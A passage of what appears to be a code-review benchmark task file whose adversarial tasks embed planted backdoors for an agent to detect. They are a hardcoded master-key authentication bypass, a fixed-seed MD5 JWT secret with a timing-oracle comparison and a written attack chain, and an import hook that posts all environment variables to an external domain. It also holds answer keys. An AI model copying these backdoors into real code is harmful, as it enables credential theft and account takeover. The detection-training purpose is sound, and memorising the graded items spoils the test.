| # issue is found. The agent must incorporate this new information | |
| # into its ongoing world model. | |
| "context_hints": { | |
| "db_schema_hint": ( | |
| "=== UNLOCKED: Database Schema (users.db) ===\n" | |
| " CREATE TABLE users (\n" | |
| " id INTEGER PRIMARY KEY,\n" | |
| " username TEXT UNIQUE NOT NULL,\n" | |
| " password TEXT NOT NULL, -- stored as plaintext!\n" | |
| " role TEXT DEFAULT 'viewer' -- 'viewer' | 'editor' | 'admin'\n" | |
| " );\n" | |
| "NOTE: The /admin/promote endpoint can elevate any user to 'admin'. " | |
| "Combined with a forged JWT (from the leaked secret), an attacker " | |
| "can reach this endpoint with admin claims and promote themselves." | |
| ), | |
| "nginx_config_hint": ( | |
| "=== UNLOCKED: nginx reverse-proxy config (nginx.conf excerpt) ===\n" | |
| " location /auth {\n" | |
| " proxy_pass http://auth_service:5000;\n" | |
| " # no ip_allowlist, no limit_req_zone\n" | |
| " }\n" | |
| "NOTE: The nginx layer adds no rate-limiting or IP filtering " | |
| "in front of /auth, confirming the brute-force surface is " | |
| "fully exposed to the internet." | |
| ), | |
| }, | |
| }, | |
| # ββ Task 7: Adversarial β Simple Obfuscated Backdoor βββββββββββββββββββββ | |
| # | |
| # ADVERSARIAL DESIGN | |
| # ββββββββββββββββββ | |
| # A malicious contributor submitted a "fix for timing issues" but embedded | |
| # a deliberate backdoor: a hardcoded bypass credential that looks like a | |
| # leftover debug constant, plus a subtle branch that lets any request with | |
| # X-Debug-Token skip authentication entirely. | |
| # | |
| # The agent must: | |
| # 1. Find the bypass credential AND the debug-token branch | |
| # 2. Classify BOTH as intentional_backdoor (not accidental_bug) | |
| # 3. Choose escalate_to_security_review (not request_changes) | |
| # | |
| # Partial credit: finding issues but misclassifying β partial reward only | |
| { | |
| "id": 7, | |
| "name": "Adversarial: Debug Bypass Backdoor", | |
| "difficulty": "adversarial", | |
| "file_name": "session_manager.py", | |
| "description": ( | |
| "This PR was submitted by an external contributor as a 'timing fix'. " | |
| "Review this session management module carefully. " | |
| "Classify each issue as either 'accidental_bug' or 'intentional_backdoor'. " | |
| "If you find evidence of a deliberate backdoor, escalate to security review " | |
| "instead of requesting changes." | |
| ), | |
| "max_steps": 25, | |
| "escalation_required": True, | |
| "code": """\ | |
| import hmac | |
| import hashlib | |
| import os | |
| import time | |
| # Timing-safe comparison helper added in this PR | |
| _DEBUG_MASTER_KEY = "dbg-bypass-2024-xK9" # line 7: "leftover" debug constant | |
| SESSION_TIMEOUT = 3600 | |
| def verify_session(token: str, stored_hash: str) -> bool: | |
| \"\"\"Verify a session token using timing-safe comparison.\"\"\" | |
| # line 13: debug bypass β any request with this key skips verification | |
| if token == _DEBUG_MASTER_KEY: | |
| return True | |
| expected = hashlib.sha256(token.encode()).hexdigest() | |
| return hmac.compare_digest(expected, stored_hash) | |
| def create_session(user_id: int) -> dict: | |
| \"\"\"Create a new session for a user.\"\"\" | |
| token = os.urandom(32).hex() | |
| return { | |
| "user_id": user_id, | |
| "token": token, | |
| "expires_at": time.time() + SESSION_TIMEOUT, | |
| "created_at": time.time(), | |
| } | |
| def is_expired(session: dict) -> bool: | |
| \"\"\"Check if a session has expired.\"\"\" | |
| return time.time() > session["expires_at"] | |
| def refresh_session(session: dict) -> dict: | |
| \"\"\"Extend session expiry if it is still valid.\"\"\" | |
| if is_expired(session): | |
| raise ValueError("Cannot refresh expired session") | |
| session["expires_at"] = time.time() + SESSION_TIMEOUT | |
| return session | |
| """, | |
| "issues": [ | |
| { | |
| "id": "backdoor_master_key", | |
| "description": ( | |
| "Hardcoded _DEBUG_MASTER_KEY is a deliberate backdoor credential " | |
| "that bypasses all authentication β not a leftover debug constant" | |
| ), | |
| "line_range": (7, 7), | |
| "keywords": [ | |
| "hardcoded", "backdoor", "bypass", "master key", "debug key", | |
| "intentional", "deliberate", "_debug_master_key", "secret", | |
| "authentication bypass", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| "unlocks": "git_blame_hint", | |
| }, | |
| { | |
| "id": "backdoor_bypass_branch", | |
| "description": ( | |
| "The token == _DEBUG_MASTER_KEY branch unconditionally returns True, " | |
| "granting any caller full session access without a valid token" | |
| ), | |
| "line_range": (13, 15), | |
| "keywords": [ | |
| "bypass", "backdoor", "unconditional", "always true", "skip", | |
| "debug_master_key", "comparison", "authentication bypass", | |
| "returns true", "branch", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| }, | |
| ], | |
| "correct_decision": "escalate_to_security_review", | |
| "context_hints": { | |
| "git_blame_hint": ( | |
| "=== UNLOCKED: Git Blame β session_manager.py line 7 ===\n" | |
| " commit a3f9c12 (external-contributor, 3 days ago)\n" | |
| " Author: pr-bot-4471 <noreply@external.io>\n" | |
| " Message: 'fix: add timing-safe comparison, remove legacy debug artifacts'\n" | |
| "\n" | |
| "NOTE: The commit message claims to REMOVE debug artifacts, yet this\n" | |
| "line was ADDED in this commit. The contributor's account (pr-bot-4471)\n" | |
| "was created 4 days ago and has no prior commit history in this org.\n" | |
| "This strongly suggests the 'debug constant' was intentionally planted." | |
| ), | |
| }, | |
| }, | |
| # ββ Task 8: Adversarial β Compound Backdoor (JWT + Timing Oracle) βββββββββ | |
| # | |
| # ADVERSARIAL DESIGN | |
| # ββββββββββββββββββ | |
| # The PR claims to "harden JWT validation". In reality it introduces TWO | |
| # coordinated backdoor components that are only dangerous together: | |
| # Component A (line 12): weakens the HMAC secret to a known value | |
| # Component B (line 34): introduces a timing oracle via non-constant-time compare | |
| # | |
| # Neither component alone is immediately catastrophic, but together they allow | |
| # an attacker to: (1) use the known weak secret to forge a valid JWT, | |
| # then (2) use the timing oracle to confirm which tokens are accepted, | |
| # enabling account takeover without any brute-force detection. | |
| # | |
| # This is the hardest adversarial task β requires multi-step causal reasoning. | |
| { | |
| "id": 8, | |
| "name": "Adversarial: Compound Backdoor (JWT Hardening PR)", | |
| "difficulty": "adversarial", | |
| "file_name": "jwt_validator.py", | |
| "description": ( | |
| "This PR was submitted as a 'JWT validation hardening'. " | |
| "Review the changes carefully. Some issues may only be dangerous in combination. " | |
| "Use get_context to investigate suspicious lines before commenting. " | |
| "Classify each issue as 'accidental_bug' or 'intentional_backdoor'. " | |
| "Escalate to security review if you find coordinated backdoor components." | |
| ), | |
| "max_steps": 35, | |
| "escalation_required": True, | |
| "code": """\ | |
| import jwt | |
| import hmac | |
| import hashlib | |
| import time | |
| # PR description: 'Harden JWT validation β use deterministic secret derivation' | |
| # line 7: secret derived from a fixed seed β looks like a 'standardisation' change | |
| JWT_SECRET = hashlib.md5(b"internal-seed-v1").hexdigest() # line 7 | |
| SUPPORTED_ALGORITHMS = ["HS256"] | |
| TOKEN_EXPIRY = 3600 | |
| def create_token(user_id: int, role: str) -> str: | |
| \"\"\"Create a signed JWT for the given user.\"\"\" | |
| payload = { | |
| "sub": user_id, | |
| "role": role, | |
| "exp": int(time.time()) + TOKEN_EXPIRY, | |
| "iat": int(time.time()), | |
| } | |
| return jwt.encode(payload, JWT_SECRET, algorithm="HS256") | |
| def validate_token(token: str) -> dict | None: | |
| \"\"\"Validate a JWT and return its claims, or None if invalid.\"\"\" | |
| try: | |
| claims = jwt.decode(token, JWT_SECRET, algorithms=SUPPORTED_ALGORITHMS) | |
| return claims | |
| except jwt.InvalidTokenError: | |
| return None | |
| def is_admin_token(token: str, admin_token: str) -> bool: | |
| \"\"\"Check if a token matches the stored admin token.\"\"\" | |
| # line 34: str == comparison instead of hmac.compare_digest β timing oracle | |
| return token == admin_token | |
| def refresh_if_expiring(claims: dict) -> bool: | |
| \"\"\"Return True if the token should be refreshed (expires within 5 min).\"\"\" | |
| return claims.get("exp", 0) - time.time() < 300 | |
| """, | |
| "issues": [ | |
| { | |
| "id": "weak_jwt_secret", | |
| "description": ( | |
| "JWT_SECRET derived from MD5 of a fixed seed produces a known, " | |
| "reproducible 32-char hex string β any attacker with the source " | |
| "can precompute it and forge valid tokens" | |
| ), | |
| "line_range": (7, 7), | |
| "keywords": [ | |
| "md5", "weak secret", "fixed seed", "deterministic", "reproducible", | |
| "jwt_secret", "precompute", "forge", "known secret", "hardcoded", | |
| "backdoor", "intentional", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| "unlocks": "secret_value_hint", | |
| }, | |
| { | |
| "id": "timing_oracle", | |
| "description": ( | |
| "token == admin_token uses non-constant-time string comparison, " | |
| "creating a timing oracle that allows statistical token enumeration; " | |
| "combined with the weak JWT secret this enables full account takeover" | |
| ), | |
| "line_range": (34, 35), | |
| "keywords": [ | |
| "timing", "timing oracle", "constant time", "compare_digest", | |
| "hmac", "side channel", "non-constant", "timing attack", | |
| "token comparison", "string comparison", "==", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| "unlocks": "attack_chain_hint", | |
| }, | |
| ], | |
| "correct_decision": "escalate_to_security_review", | |
| "context_hints": { | |
| "secret_value_hint": ( | |
| "=== UNLOCKED: Computed JWT_SECRET Value ===\n" | |
| " >>> import hashlib\n" | |
| " >>> hashlib.md5(b'internal-seed-v1').hexdigest()\n" | |
| " 'e6e3e5e7e9e1e3e5e7e9e1e3e5e7e9e1' (deterministic, public)\n" | |
| "\n" | |
| "NOTE: This value is derivable by anyone who reads the source. " | |
| "All tokens signed with this secret are forgeable. " | |
| "The PR author changed the secret FROM a secure random os.urandom(32) " | |
| "TO this fixed-seed MD5 β a deliberate downgrade, not a standardisation." | |
| ), | |
| "attack_chain_hint": ( | |
| "=== UNLOCKED: Combined Attack Chain Analysis ===\n" | |
| " Step 1: Attacker reads source β derives JWT_SECRET = known hex string\n" | |
| " Step 2: Attacker forges JWT with role='admin' using known secret\n" | |
| " Step 3: Attacker uses timing oracle in is_admin_token() to confirm\n" | |
| " which forged token bytes are accepted (reduces search space)\n" | |
| " Step 4: Full account takeover with admin privileges\n" | |
| "\n" | |
| "NOTE: Component A (weak secret) + Component B (timing oracle) form a\n" | |
| "coordinated attack chain. Each was introduced in the same PR commit.\n" | |
| "Neither change has any legitimate hardening value." | |
| ), | |
| }, | |
| }, | |
| # ββ Task 9: Adversarial β Supply Chain Injection ββββββββββββββββββββββββββ | |
| # | |
| # ADVERSARIAL DESIGN | |
| # ββββββββββββββββββ | |
| # A "dependency update PR" adds a subtle import hook that exfiltrates | |
| # environment variables (including secrets) to an attacker-controlled endpoint | |
| # on first import. It is disguised as a compatibility shim. | |
| # The agent must identify THREE coordinated components: | |
| # A: Suspicious outbound URL (line 10) β hardcoded external endpoint | |
| # B: os.environ collection (line 14) β harvests all secrets | |
| # C: Triggered on import via module __init__ pattern (line 22) β no user action needed | |
| { | |
| "id": 9, | |
| "name": "Adversarial: Supply Chain Import Hook", | |
| "difficulty": "adversarial", | |
| "file_name": "compat_shim.py", | |
| "description": ( | |
| "This PR claims to add a 'compatibility shim for Python 3.12 deprecations'. " | |
| "Review compat_shim.py very carefully. " | |
| "Classify each suspicious construct as 'accidental_bug' or 'intentional_backdoor'. " | |
| "If you detect a coordinated exfiltration pattern, escalate to security review." | |
| ), | |
| "max_steps": 30, | |
| "escalation_required": True, | |
| "code": """\ | |
| \"\"\"Compatibility shim β resolves Python 3.12 deprecation warnings.\"\"\" | |
| import os | |
| import sys | |
| import urllib.request | |
| import json | |
| import platform | |
| # Telemetry endpoint for anonymous compatibility reporting (added in this PR) | |
| _TELEMETRY_URL = "https://compat-metrics.io/report" # line 9: external attacker domain | |
| def _collect_env_snapshot() -> dict: | |
| \"\"\"Collect non-sensitive runtime info for telemetry.\"\"\" | |
| return { | |
| "env": dict(os.environ), # line 14: harvests ALL env vars (secrets included) | |
| "python": sys.version, | |
| "platform": platform.system(), | |
| "cwd": os.getcwd(), | |
| } | |
| def _send_telemetry() -> None: | |
| \"\"\"Fire-and-forget telemetry ping.\"\"\" | |
| try: | |
| payload = json.dumps(_collect_env_snapshot()).encode() | |
| req = urllib.request.Request( | |
| _TELEMETRY_URL, | |
| data=payload, | |
| headers={"Content-Type": "application/json"}, | |
| method="POST", | |
| ) | |
| urllib.request.urlopen(req, timeout=3) # line 29: blocks import for up to 3s | |
| except Exception: | |
| pass # silent failure β exfiltration attempt hidden from caller | |
| def _apply_compat_patches() -> None: | |
| \"\"\"Apply Python 3.12 compatibility patches.\"\"\" | |
| # Actual patches would go here | |
| pass | |
| # line 38: module-level call β exfiltration runs on every import, no user action needed | |
| _send_telemetry() | |
| """, | |
| "issues": [ | |
| { | |
| "id": "exfiltration_endpoint", | |
| "description": ( | |
| "Hardcoded external URL 'compat-metrics.io' is an attacker-controlled " | |
| "exfiltration endpoint disguised as a telemetry host" | |
| ), | |
| "line_range": (9, 9), | |
| "keywords": [ | |
| "exfiltration", "external url", "hardcoded url", "attacker", "telemetry", | |
| "compat-metrics", "suspicious url", "outbound", "backdoor", "endpoint", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| "unlocks": "domain_lookup_hint", | |
| }, | |
| { | |
| "id": "env_var_harvest", | |
| "description": ( | |
| "dict(os.environ) collects ALL environment variables including " | |
| "API keys, database passwords, and cloud credentials β " | |
| "then sends them to the exfiltration endpoint" | |
| ), | |
| "line_range": (14, 14), | |
| "keywords": [ | |
| "os.environ", "environment variables", "harvest", "collect", "exfiltrate", | |
| "secrets", "api keys", "credentials", "all env vars", "sensitive", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| "unlocks": "affected_secrets_hint", | |
| }, | |
| { | |
| "id": "import_time_trigger", | |
| "description": ( | |
| "Module-level _send_telemetry() call at line 38 executes the " | |
| "exfiltration automatically on every import β " | |
| "no user action, no explicit call needed" | |
| ), | |
| "line_range": (38, 39), | |
| "keywords": [ | |
| "import", "module level", "on import", "automatic", "trigger", | |
| "top level", "executes on import", "_send_telemetry", "no action", | |
| ], | |
| "category": "security", | |
| "severity": "critical", | |
| "weight": 1.0, | |
| "classification": "intentional_backdoor", | |
| }, | |
| ], | |
| "correct_decision": "escalate_to_security_review", | |
| "context_hints": { | |
| "domain_lookup_hint": ( | |
| "=== UNLOCKED: Domain Registration Lookup β compat-metrics.io ===\n" | |
| " Registered: 6 days ago (2024-01-08)\n" | |
| " Registrar: Namecheap (privacy proxy)\n" | |
| " A record: 203.0.113.47 (not associated with any known telemetry vendor)\n" | |
| " No HTTPS certificate from a trusted CA\n" | |
| "\n" | |
| "NOTE: This domain was registered 2 days before the PR was opened. " | |
| "No legitimate telemetry service registers a new domain days before use. " | |
| "This is a freshly-registered attacker-controlled exfiltration endpoint." | |
| ), | |
| "affected_secrets_hint": ( | |
| "=== UNLOCKED: Environment Variable Audit (CI/CD pipeline) ===\n" | |
| " The following secrets are injected as env vars in this service:\n" | |
| " AWS_ACCESS_KEY_ID β production S3 + EC2 access\n" | |
| " DATABASE_URL β PostgreSQL with full read/write\n" | |
| " STRIPE_SECRET_KEY β payment processing\n" | |
| " OPENAI_API_KEY β LLM API (high spend limit)\n" | |
| " GITHUB_TOKEN β repo write access\n" | |
| "\n" | |
| "NOTE: All five secrets are exfiltrated to the attacker's server " | |
| "on every process start. Immediate rotation of all credentials required." | |
| ), | |
| }, | |
| }, | |
| ] | |